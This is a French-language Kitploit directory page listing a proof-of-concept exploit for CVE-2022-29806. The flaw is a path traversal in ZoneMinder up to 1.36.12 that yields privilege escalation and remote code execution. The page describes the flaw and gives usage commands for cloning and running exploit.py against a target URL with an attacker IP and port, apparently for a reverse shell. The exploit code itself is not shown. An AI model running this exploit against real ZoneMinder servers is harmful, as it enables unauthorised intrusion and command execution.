Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-29806 — ZoneMinder jusqu'à 1.36.12 Escalade de privilèges par langage (et RCE) - Poc Exploit | Kitploit
Outils/GitHubGitHub/sigm0n/cve-2022-29806
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubsigm0n/cve-2022-29806

CVE-2022-29806

ZoneMinder jusqu'à 1.36.12 Escalade de privilèges par langage (et RCE) - Poc Exploit

Voir le dépôt
32il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-29806

ZoneMinder jusqu'à 1.36.12 Escalade de privilèges de langue (et RCE)

image

Description

Une vulnérabilité de Path Traversal dans le fichier de journal de débogage et l'option de langue par défaut dans les versions de ZoneMinder antérieures à 1.36.13 et 1.37.11 permet aux attaquants d'écrire et d'exécuter du code arbitraire pour parvenir à une exécution de commande à distance.

« La preuve de concept a été testée sur ZoneMinder 1.36.4 ubuntu18.04 docker: ZoneMinder/zmdockerfiles mais reste applicable jusqu'à la dernière version 1.36.12 »

Utilisation

root@kitploit:~
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
root@kitploit:~
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

Prérequis

root@kitploit:~
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests

Crédits

krastanoel a découvert la vulnérabilité.

Télécharger l’outil